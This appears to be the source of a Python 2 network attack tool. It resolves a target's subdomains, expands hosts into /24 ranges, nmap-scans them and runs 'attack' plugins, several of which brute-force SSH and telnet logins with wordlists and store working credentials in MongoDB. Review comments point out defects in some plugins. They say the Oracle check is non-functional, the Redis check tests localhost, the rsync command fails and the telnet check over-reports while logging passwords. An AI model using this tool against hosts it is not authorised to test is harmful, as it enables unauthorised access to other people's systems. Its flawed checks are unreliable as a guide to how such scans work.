--------------------------------------------------------------------------------
/lib/plugins/oracle.py:
--------------------------------------------------------------------------------
#coding:utf-8

def oracle_attack(host, port, mongo):
    """Placeholder Oracle check: no connection is ever attempted.

    Not wired into lib/portscan.py's dispatch (there is no 1521 branch), and
    dict/oracle_user.dic / dict/oracle_pass.dic do not exist in the
    repository tree, so calling it raises IOError at the first ``open``.
    Were the files present, the body would insert a result document for
    every user/password pair (the insert precedes any check), then hit
    NameError on ``db.close()`` because ``db`` is never bound -- swallowed
    by the bare ``except``.  The ``name`` field also says "mysql".
    """
    _info = dict(
        name="mysql",
        ip=host,
        port=port,
        username="",
        password=""
    )

    # Dictionary brute-force attempt.
    for username in open("dict/oracle_user.dic", "r"):
        for password in open("dict/oracle_pass.dic", "r"):
            _username = username.strip()
            _password = password.strip()
            try:
                _info["username"] = _username
                _info["password"] = _password
                mongo.insert(_info)
                db.close()
                break
            except:
                pass

--------------------------------------------------------------------------------
/lib/plugins/redis.py:
--------------------------------------------------------------------------------
import redis


def redis_attack(host, port, mongo):
    """Record *host*:*port* as an unauthenticated Redis if a write succeeds.

    The client is built for ``localhost:6379`` with a 2 s socket timeout;
    the *host* and *port* arguments are only copied into the result
    document.  The check is a write (``foo`` = ``bar``) to whatever Redis
    answers on the local machine, so a result here describes the scanner
    host's own Redis, stored under the scanned host's address.  Any
    exception is swallowed.
    """
    _info = dict(
        name="redis",
        ip=host,
        port=port,
        username="",
        password=""
    )
    try:
        r = redis.StrictRedis(host='localhost', port=6379, db=0,socket_timeout=2)
        r.set('foo', 'bar')
        mongo.insert(_info)
    except:
        pass

--------------------------------------------------------------------------------
/lib/plugins/rsync.py:
--------------------------------------------------------------------------------
#coding:utf-8

import subprocess
import time
# failed
def rsync_attack(host, port, mongo):
    """Intended rsync module-listing check; marked "failed" by the author.

    The command string is handed to ``Popen`` without ``shell=True``, so
    the whole string ``"rsync <host>::; exit 0"`` is treated as a single
    program name; ``Popen`` raises OSError, the bare ``except`` swallows it
    and nothing is recorded.  The surrounding logic would insert a result
    whenever ``poll()`` is falsy after 2 s -- i.e. exit status 0 or a
    process still running (``poll()`` returns None then) -- so it does not
    distinguish "listing succeeded" from "still waiting".  ``stdout=None``
    means any output would go to the scanner's own stdout.
    """
    _info = dict(
        name="rsync",
        ip=host,
        port=port,
        username="",
        password=""
    )

    try:
        cmd = "rsync "+host+"::; exit 0"
        p = subprocess.Popen(cmd,stdout=None)
        time.sleep(2)
        if p.poll():
            pass
        else:
            mongo.insert(_info)
    except:
        pass

--------------------------------------------------------------------------------
/lib/plugins/ssh.py:
--------------------------------------------------------------------------------
# coding:utf-8

import paramiko


def ssh_attack(host, port, mongo):
    """Try dictionary credentials against SSH on *host*; record the hit.

    Pairs dict/ssh_user.dic with dict/ssh_pass.dic and attempts a password
    login on port 22 (the *port* argument is only stored) with a 5 s
    timeout.  ``AutoAddPolicy`` accepts any host key without verification,
    so the password is sent to whatever answers on that port.  The first
    working password per user is recorded and the password loop ends.  The
    client is never closed; the bare ``except`` hides all failures, including
    a missing dictionary file.  Each attempt is a new TCP connection and a
    separate authentication failure on the server.
    """
    _info = dict(
        name="ssh",
        ip=host,
        port=port,
        username="",
        password=""
    )

    # Dictionary brute-force attempt.
    for username in open("dict/ssh_user.dic", "r"):
        for password in open("dict/ssh_pass.dic", "r"):
            _username = username.strip()
            _password = password.strip()
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(host, 22, _username, _password, timeout=5)
                _info["username"] = _username
                _info["password"] = _password
                mongo.insert(_info)
                break
            except:
                pass

--------------------------------------------------------------------------------
/lib/plugins/telnet.py:
--------------------------------------------------------------------------------
# coding:utf-8

import telnetlib


def telnet_attack(host, port, mongo):
    """Try dictionary credentials against a telnet service; record the hit.

    Pairs dict/telnet_user.dic with dict/telnet_pass.dic.  The 1 s timeout
    applies to the connect only; the ``read_until`` calls have no timeout
    and block until the expected prompt or EOF.  ``set_debuglevel(3)``
    makes telnetlib echo the whole session -- including every password
    sent -- to the scanner's stdout, so console logs of a run contain the
    credentials tried.  The success test ``if tn.read_until(...)`` is true
    for any non-empty data read, not only when ``<user>@`` actually
    appeared, so it over-reports.  Prompts are matched literally
    ("login: ", "Password: ").  The Telnet object is never closed.
    """
    _info = dict(
        name="telnet",
        ip=host,
        port=port,
        username="",
        password=""
    )

    # Dictionary brute-force attempt.
    for username in open("dict/telnet_user.dic", "r"):
        for password in open("dict/telnet_pass.dic", "r"):
            _username = username.strip()
            _password = password.strip()
            try:
                tn = telnetlib.Telnet(host, port, timeout=1)
                tn.set_debuglevel(3)
                # Send the login username.
                tn.read_until("login: ")
                tn.write(_username + '\n')
                # Send the login password.
                tn.read_until("Password: ")
                tn.write(_password + '\n')
                if tn.read_until(_username + "@"):
                    _info["username"] = _username
                    _info["password"] = _password
                    mongo.insert(_info)
                    break
            except:
                pass

--------------------------------------------------------------------------------
/lib/portscan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# __author__ jax777
#
# Port-scan stage: pulls status-0 hosts from MongoDB, runs nmap against a
# fixed port list and hands each open port to the matching plugin.  Results
# are written back to the host document (``portinfo``, ``status``, ``isup``);
# plugin findings go to the separate ``Wdb`` collection.  Python 2 code.
import nmap
import threading
import Queue
import sys
import time
from plugins.ftp import *
from plugins.ssh import *
from plugins.telnet import *
from plugins.mongo import *
from plugins.mysql import *
from plugins.mssql import *
from plugins.memcache import *
from plugins.elasticsearch import *
from plugins.redis import *
from plugins.rsync import *


class Portscan:
    """Thread pool that nmap-scans every status-0 host and dispatches plugins.

    ``run()`` holds ``g_lock`` for the whole stage, mirroring Dnstask.  Host
    status values written here: 1 = scan started, 2 = scan finished;
    ``isup`` is set to 0 when the scan or result parsing raised.
    """
    def __init__(self,threads_num,mongodb,g_lock,Wdb):
        # threads_num: worker thread count.
        # mongodb: host collection (read status-0 docs, write results).
        # g_lock: stage lock shared with scan.py.
        # Wdb: collection that the plugins insert their findings into.
        self.wdb = Wdb
        self.db = mongodb
        self.thread_count = self.threads_num = threads_num
        self.g_lock = g_lock
        self.lock = threading.Lock()
        self.STOP_ME = False

    def _queuesetup(self):
        """Queue the ``ip`` of every host document whose status is 0."""
        self.queue = Queue.Queue()
        for item in self.db.find({"status": 0 }):
            self.queue.put(item["ip"])
    def _startnmap(self):
        """Worker body: scan hosts from the queue until it drains or STOP_ME.

        Per host: mark status 1, run nmap with ``-sS`` (a SYN scan, which
        nmap normally only allows with raw-socket privilege -- verify for
        the deployment) over the fixed port list, keep only ports whose
        state is "open", call the plugin for each recognised port number,
        then store the open-port map as ``portinfo`` and mark status 2.

        Error handling, from the inside out: a plugin raising IOError
        (missing dictionary file) prints "nofile" and the next port is
        tried; AttributeError anywhere in the dispatch loop is ignored; any
        other exception around the scan -- including a host absent from the
        nmap result (``nm[ip]`` KeyError) or one with no TCP entry
        (``.get("tcp")`` is None, so ``.items()`` raises) -- sets
        ``isup`` to 0.  ``portinfo`` is still written afterwards with
        whatever ``result`` holds (``{}`` or ``None`` in those cases).

        NOTE(review): as in Dnstask._scan, ``queue.get(timeout=1.0)`` is
        outside the ``try``; Queue.Empty here would end the thread without
        decrementing ``thread_count`` and run() would wait forever.
        """
        while self.queue.qsize() > 0 and not self.STOP_ME :
            ip = self.queue.get(timeout=1.0)
            print "start scan" + ip + "\n"
            self.db.update({'ip': ip}, {"$set" : {'status' : 1}})
            result = {}
            try:
                nm = nmap.PortScanner()
                nm.scan(hosts= ip , arguments='-sS -p 21,22,23,25,53,67,68,69,80,110,139,143,161,389,443,512,513,514,873,1080,1352,1433,1521,2049,2181,3306,3389,4000-5000,5432,5632,5900,6379,7000-9000,9090,9200,9300,11211,27017,37017')
                result = nm[ip].get("tcp")
                # Re-key by string so the map can be stored as a Mongo document.
                result = {str(v):k for v, k in result.items()}
                # Python 2 ``items()`` is a list, so popping while iterating is
                # safe here; it would raise RuntimeError under Python 3.
                for v, k in result.items():
                    if k["state"] != "open":
                        result.pop(v)
                try:
                    for j,q in result.items():
                        port = int(j)
                        try:
                            # Plugins receive the int port and the findings
                            # collection; ports not listed are recorded only.
                            if port == 21:
                                ftp_attack(ip,port,self.wdb) #attack
                            elif port == 22:
                                ssh_attack(ip,port,self.wdb)
                            elif port == 23:
                                telnet_attack(ip,port,self.wdb)
                            elif port == 873:
                                rsync_attack(ip,port,self.wdb)
                            elif port == 27017:
                                mongo_attack(ip,port,self.wdb)
                            elif port == 37017:
                                mongo_attack(ip,port,self.wdb)
                            elif port == 3306:
                                mysql_attack(ip,port,self.wdb)
                            elif port == 1433:
                                mssql_attack(ip,port,self.wdb)
                            elif port == 6379:
                                redis_attack(ip,port,self.wdb)
                            elif port == 9200:
                                elasticsearch_attack(ip,port,self.wdb)
                            elif port == 11211:
                                memcache_attack(ip,port,self.wdb)
                        except IOError:
                            print "nofile"
                except AttributeError:
                    pass
            except:
                self.db.update({'ip': ip}, {"$set" : {'isup' : 0 }})
            temp = dict(
                portinfo = result
            )
            self.db.update({'ip': ip}, {"$set" : {'status' : 2}})
            self.db.update({'ip': ip}, {"$set" : temp})

        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()
    def run(self):
        """Build the queue, start the workers and block until all have exited.

        Holds ``g_lock`` throughout.  A KeyboardInterrupt only sets
        ``STOP_ME``; the loop keeps waiting for the daemon threads.  Once
        ``thread_count`` is 1 the loop stops sleeping and busy-waits.
        """
        self.g_lock.acquire()
        self._queuesetup()
        for i in range(self.threads_num):
            t = threading.Thread(target=self._startnmap, name=str(i))
            t.setDaemon(True)
            t.start()
        while 1:
            if self.thread_count > 1:
                try:
                    time.sleep(1.0)
                except KeyboardInterrupt,e:
                    msg = '[WARNING] User aborted, wait all slave threads to exit...'
                    sys.stdout.write('\r' + msg + '\n\r')
                    sys.stdout.flush()
                    self.STOP_ME = True
            if self.thread_count == 0:
                self.g_lock.release()
                break

--------------------------------------------------------------------------------
/lib/portscan.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/portscan.pyc
--------------------------------------------------------------------------------
/require.sh:
--------------------------------------------------------------------------------
apt-get install -y python-dev
apt-get install -y nmap
pip install paramiko
apt-get install -y python2.7-mysqldb
pip install dnspython
pip install pymongo
pip install python-nmap
apt-get install -y freetds-dev
pip install pymssql
pip install redis
pip install python-memcached
--------------------------------------------------------------------------------
/scan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# __author__ jax777
#
# Entry point.  Runs the three stages in order, serialised on one lock:
#   1. Dnstask  -- resolve subdomains of the target into MongoDB
#   2. lsip     -- expand every public address found into its /24
#   3. Portscan -- nmap each host and run the per-service plugins
# Results live in database ``scan_info``: collection ``<target>`` holds the
# hosts, ``<target>_vul`` the plugin findings.  Python 2 code.
import sys
import optparse
from lib.dnstask import Dnstask
from lib.iplist import *
from lib.portscan import *
from lib.mongodb import *
import threading

def is_intranet(ip): # intranet IP check
    """Return 1 when *ip* looks like a private (RFC 1918) address, else 0.

    Duplicate of lib.dnstask.is_intranet; it is not called anywhere in this
    file's main block.  Inputs that do not split into four parts return 1.
    ``int(ret[1])`` raises ValueError on a non-numeric second octet.
    """
    ret = ip.split('.')
    if not len(ret) == 4:
        return 1
    if ret[0] == '10':
        return 1
    # NOTE(review): RFC 1918's block is 172.16-172.31; 32 is one past it.
    if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
        return 1
    if ret[0] == '192' and ret[1] == '168':
        return 1
    return 0


if __name__ == '__main__':
    parser = optparse.OptionParser('usage: %prog [options] target.com')
    parser.add_option('-t', '--threads', dest='threads_num',
                      default=30, type='int',
                      help='Number of threads. default = 30')
    parser.add_option('-f', '--file', dest='names_file', default='subnames.txt',
                      type='string', help='Dict file used to brute sub names')
    (options, args) = parser.parse_args()
    if len(args) < 1:
        parser.print_help()
        sys.exit(0)
    # The target string is used verbatim as the Mongo collection name.
    target=args[0]
    mongodb = Mongodb(db_info,target)
    Wdb = Mongodb(db_info,target+"_vul")
    # Each stage's run() acquires g_lock and releases it when its threads
    # are done; the acquire() calls below wait for that before continuing.
    g_lock = threading.Lock()
    d = Dnstask(target=target, names_file=options.names_file,
                threads_num=options.threads_num,mongodb = mongodb,g_lock =g_lock
                )
    d.run()
    g_lock.acquire()
    print "list all ip \n"
    lsip(mongodb)
    g_lock.release()
    print "start portscan \n"
    p = Portscan(threads_num=options.threads_num,mongodb = mongodb,g_lock =g_lock,Wdb = Wdb)
    p.run()
    g_lock.acquire()
    print "task over \n"
--------------------------------------------------------------------------------